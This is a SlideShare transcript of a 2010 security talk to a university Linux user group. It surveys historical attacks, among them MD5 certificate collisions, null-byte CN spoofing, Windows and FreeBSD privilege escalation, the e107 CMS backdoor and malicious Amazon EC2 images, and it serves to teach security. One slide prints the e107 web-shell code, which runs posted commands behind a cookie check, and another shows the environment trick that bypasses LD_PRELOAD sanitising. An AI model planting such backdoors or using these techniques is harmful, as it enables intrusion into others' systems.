Your SlideShare is downloading. ×
  • Like
  • Save
Attacks and Defences
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×

Now you can save presentations on your phone or tablet

Available for both IPhone and Android

Text the download link to your phone

Standard text messaging rates apply

Attacks and Defences

  • 854 views
Published

Presentation by Marco Slaviero at the University of Pretoria to the Tuks Linux User Group in 2010. …

Presentation by Marco Slaviero at the University of Pretoria to the Tuks Linux User Group in 2010.

The aim of this presentation is to promote information security. The presentation begins with a look at a few recent attacks. Cloud computing is briefly discussed. The presentation ends with a discussion on Amazon web services and its security.

Published in Technology
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
No Downloads

Views

Total Views
854
On SlideShare
0
From Embeds
0
Number of Embeds
1

Actions

Shares
Downloads
0
Comments
0
Likes
1

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. Attacks and defences Or, really cool hacks
    • [email_address]
  • 2. About Us
    • pta.za company
    • +- 20 ppl
    • Pen-testing for a living
      • VMS
      • training
    • www.sensepost.com
    • [email_address]
  • 3. Why this talk?
    • Explain a little about recent attacks
    • Promote security
    • FLOSS angle? hmmm. FLOSS also insecure?
    • ZaCon (but only at the end, I promise)
  • 4. x509 and MD5
  • 5.  
  • 6.  
  • 7. x509 attack: MD5
    • Security of system rests in the certificate signature
    • Security of signature lies in the hashing algorithm
      • (Aside: hash function == one-way function that produces fixed size output. MD5, SHA1, RIPE-MD etc)
    • If two certificates hash to the same value, then their signatures will be the same
  • 8.  
  • 9. x509 attack: MD5
    • Alexander Sotirov, Marc Stevens, Jacob Appelbaum, Arjen Lenstra, David Molnar, Dag Arne Osvik, Benne de Weger
    • Figured out a way to create two colliding certificates
    • Then found CAs issuing certs with MD5, with predictable sequence numbers
  • 10. x509 attack: MD5
    • Attack was:
      • Predict sequence number by purchasing a cert, +1000
      • Predict validity times
      • Create two colliding certificates, one legit and the other evil. Legit cert assumes fixed seq # and validity.
      • Submit CSR for legit cert
      • Holds thumbs on the timing/sequence number
      • Cut-n-paste the signature onto the evil cert
  • 11. x509 attack: MD5
      • Collision attack perform on cluster of 200 PS3
      • Could perform 3 collisions in 72 hours
      • Cost them $600 in purchased certs
      • Earned a valid CA-cert
  • 12. x509 and the CN
  • 13. x509 attack: CN
    • Moxie Marlinspike loves SSL
    • He looked into how certs are issued and validated
    • CSRs use ASN.1 to serialise their data
      • Strings are prepended by their length
    • Most libraries (by extension browsers) use C functions to validate certs
      • Strings terminated by nulls
  • 14. x509 attack: CN
      • CN when evaluated in a CSR
      • CN as seen by a browser
  • 15. x509 attack: CN
      • CA’s verify the domain from the end
      • Browsers verify the domain from the front
  • 16. x509 attack: CN
      • No explicit ban on disallowed characters in the CN
      • How about sending a NULL byte in a CSR
      • www.cs.up.ac.za 0.sensepost.com
      • CA validates from the end, and if we’re the owner of sensepost.com, then we get back a cert
      • When victims receive the malicious cert, their libs validate from the beginning, halting at NULL
  • 17. Validating the cert
      • Checks performed by the library
      • Certificate is signed by trusted CA
      • Validity is fine
      • CN appears to match hostname
      • Great!
  • 18. PKI attacks: cert checking
      • Who was vulnerable?
      • All NSS-based app
      • Firefox
      • Thunderbird
      • ...
      • IE
      • Bunch of others (Pidgin, AIM, Outlook, Evolution, VPN clients, ...)
  • 19. PKI attacks: cert checking
        • More attacks including wildcard certs as well as remote buffer overflows
        • thoughtcrime.org
  • 20. Win32 ring3 -> ring0
  • 21. Win32: privilege escalation
        • Tavis Ormandy (Google) found a bug in how ‘iret’ was handled on NetBSD <-- he’s a UNIX guy
        • Poked around on Win32
        • Found a related bug in the 8086 simluator on Win32
        • Great example of long-standing bug (*)
        • Ridiculous exploit
        • Background...
  • 22. Win32: 8086 simulator
    • Win32 supports execution of real-mode code
    • Simulated environment
    • Simulated app is run by a monitor, which performs necessary sanity checks. Provides fake interrupt handlers.
    • In real-mode, apps get to change segment registers which they can’t in protected mode.
    • Monitor calls into NT kernel when needed, on behalf of the simulated app.
  • 23. Win32: exploit description
    • Spawn ‘cmd.exe’, grab handle
    • Spawn ‘debug.exe’, which inits the NTVDM subsystem incl monitor
    • Inject a DLL into the monitor
    • DLL creates a fake kernel stack
    • Creates a new VDM context
    • Inserts a forged trap frame on the real stack, that points to fake kernel stack
    • Executes code that gens a #GP trap handler on ‘iret’
    • Handler aborts early, forged frame restored. Control passes to attacker supplied code.
    • Code searches for SYSTEM token and assigns it to the initial ‘cmd.exe’
    • Code cleans up completely and returns
    • cmd.exe is now ‘SYSTEM’
  • 24. Win32 demo
  • 25. FreeBSD rtld
  • 26. FreeBSD: rtld
    • dynamic linking
    • environment variables
      • LD_PRELOAD
      • LD_PRELOAD=mylib.so ./myproggie
        • useful: substitute standard calls etc etc
        • will execute _init() from mylib.so before main()
    • what about suid programs?
      • gotta remove dangerous environmental variables like LD_PRELOAD
  • 27. FreeBSD: rtld code
      • if (suid) {
        • ...
        • unsetenv(“LD_PRELOAD”);
        • unsetenv(“LD_LIBMAP”);
        • ...
      • }
    • int __merge_environ(){
      • ...
        • if (strchr(*env, ‘=’) == NULL) {
          • return -1;
      • ...
    • int unsetenv(const char *name){
      • ...
        • if (__merge_environ() == -1) {
          • return -1;
    • ...
    • //unset env variable here
  • 28. FreeBSD: rtld
      • So, executing with a corrupted env means the unsetenv()s will be aborted early, and the linker didn’t check for this
      • One corrupted environment is:
        • { “moomoo”, “LD_PRELOAD=mylib.so” }
        • This skips unsetting of env, but loader will still load the lib
      • Now for the evilness...
  • 29. FreeBSD demo
  • 30. e107 Backdoor
  • 31. e107 Backdoor
    • Example of a real-world attack
    • Popular Open Source CMS
    • Large community / plugins /themes / blah blah
    • A blind SQL injection vuln reported in ver 0.7.15 (Nov 3, 2009)
    • On 25 Jan 2010, a mail appeared on FD
  • 32. .
    • .
  • 33. e107: backdoor code
    • if(md5($_COOKIE['access-admin']) = &quot;cf1afec15669cb96f09befb7d70f8bcb&quot;)
    • {
    • ...
    • if(!empty($_POST['cmd']))
    • {
    • $out = execute($_POST['cmd']);
    • }
    • elseif(!empty($_POST['php'])){
    • ob_start();
    • eval($_POST['php']);
    • $out = ob_get_contents();
    • ob_end_clean();
    • }
    • ...
    • }
  • 34. e107 Backdoor
    • turns out they were owned through the SQLi bug
    • attackers replaced download link with a link to the backdoored code
  • 35. Let’s talk cloud computing
    • (it’s hot right now, isn’t it?)
  • 36. So, what exactly *is* the cloud?
  • 37.  
  • 38.  
  • 39. What drives cloud adoption?
    • Management by in-flight magazine
      • Manager Version
      • Geek Version
    • Poor history from IT
    • Economy is down
      • Cost saving becomes more attractive
      • Cloud computing allows you to move from CAPEX to OPEX
      • (Private Clouds?)
  • 40. Problems with cloud testing
    • Transparency
    • Privacy
    • Compliance
    • Legal
    • Vendor Lock-in
    • Availability
  • 41. BlackHat talk summary
    • Attacked SugarSync, SalesForce, Amazon, MobileMe
    • Not enough time!!!
    • Amazon it is then...
  • 42. Yes, it’s that cool...
  • 43. Amazon EC2
    • Elastic Compute Cloud
    • Provides Xen platform for running virtual machines
    • Easy (Web interface)
    • Auto-scales
    • Cheap
    • Login, pick VM, boot, go!
  • 44. Danger
    • Out of 2700 images, 47 are provided by Amazon
    • Are all secured equally?
    • Tested by scanning each VM with Nessus
      • 1293 Highs
      • 646 Criticals
    • Not good
    • Incompetence aside, what can we ascribe to malice?
  • 45. Can we get someone to run our machine?
    • Bundle an image
    • Register the image (Amazon assigns it an AMI-ID)
    • Wait for someone to run it
    • Profit!
    • Alas... our AMI-ID is too low!
    • Solution:
      • do { /*register stuff */ } while (ami-id > threshold)
  • 46. But there’s more
    • Our race promoted our strangely named image (qscan)
    • Let’s make it sexier
      • fedora - taken
      • fedora_core - taken
      • redhat - taken
      • fedora_core_11 - not taken!
  • 47.  
  • 48.  
  • 49. What other cloud hacks?
    • SugarSync password reset
    • ClickJacking against SalesForce
    • Porting Nikto into SalesForce
    • License stealing from Amazon
    • Image stealing from Amazon users
    • Found bugs in MobileMe
    • In a position to read Steve Wozniak’s mail :)
    • www.sensepost.com/blog
  • 50. Linux bugs (it’s TLUG)
  • 51. Linux
    • all kernels bugs are DoS
    • not really.
    • Tavis (remember him?) and Julien Tinnes found an exploitable bug in sendpage(), June 2009
    • >2.4.4 and all 2.6 kernels
    • existed since 2001
  • 52. Linux demo
  • 53. Questions? [email_address]
    • As promised:
    • ZaCon -> community
    • sec conference
    • First edition in Nov ’09
    • Papers / vids / list
    • details on the site
    • http://zacon.org.za
    Attendees / speakers welcome Great venue for 1st-time speakers Look out for announcements.